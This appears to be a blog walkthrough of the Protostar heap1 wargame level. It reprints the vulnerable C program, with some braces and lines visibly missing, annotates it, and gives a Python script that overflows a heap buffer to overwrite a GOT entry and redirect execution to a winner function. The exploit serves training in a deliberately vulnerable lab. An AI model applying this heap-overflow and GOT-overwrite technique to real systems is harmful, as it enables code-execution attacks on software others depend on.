Skip to main content

Binary Exploitation Protostar Heap1 - Walkthrough - writeups

Hello Guyz,

Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap1 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>


struct internet {
  int priority;
  char *name;

void winner()
  printf("and we have a winner @ %d\n", time(NULL));

int main(int argc, char **argv)
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");


This level takes a look at code flow hijacking in data overwrite cases.

This level is at /opt/protostar/bin/heap1

Code Review

  struct internet {
  int priority; 
  char *name;              <--- Noticiable Things is that, its a pointer.. means its take only 4 bytes to point to another location

void winner()
  printf("and we have a winner @ %d\n", time(NULL));

int main(int argc, char **argv)
  struct internet *i1, *i2, *i3;       <--- Create Three Pointers To Struct Internet

  i1 = malloc(sizeof(struct internet)); <--- Locating Space for First Struct Internet Pointers
  i1->priority = 1;                     <--- Insert Digit
  i1->name = malloc(8);                 <--- Locate Another Location For Char Pointer

  i2 = malloc(sizeof(struct internet)); <--- Locating Space For Second Struct Internet Pointer
  i2->priority = 2;                     <--- Insert Digit
  i2->name = malloc(8);                 <--- Locate Another Location For Char Pointer

  strcpy(i1->name, argv[1]);            <--- Copy String To i1
  strcpy(i2->name, argv[2]);            <--- Copy String To i2

  printf("and that's a wrap folks!\n");


  Heap Overview

 | i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) |  Name (8) |  Name (8) |
We Just Need To Overwrite Char Pointer of i2 So, that during copying data from argument, strcpy will copy data to name location and to do it, strcpy will access the pointer of char name. and (because of us) strcpy will overwrite GOT table with argv[2] 
  Overflow Name And Write Data To FP


import struct

buf = "\x90"*4*5

# Address Of Put wrapper inot global table
puts_glob = 0x08049774

# Need To Overwrite put with
win = 0x08048494

ret = struct.pack("I",win)

payload = ''
payload+= buf
payload+= struct.pack("I", puts_glob)
payload+= " "
payload+= struct.pack("I",win)
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist

Related Post

Top Visited

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

how to install burp suite in Linux/Ubuntu 16.04

Create Simple Packet Sniffer Using Python

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

Best 1000 User-agents List For Web Scraping

How To Install GDB Peda?

2 Easiest Way To Enable Monitor Mode in Kali Linux | Airmon-ng | Iwconfig

How To Create Snake Game Using Python And Tkinter - Simple python games

Latest Google Dorks List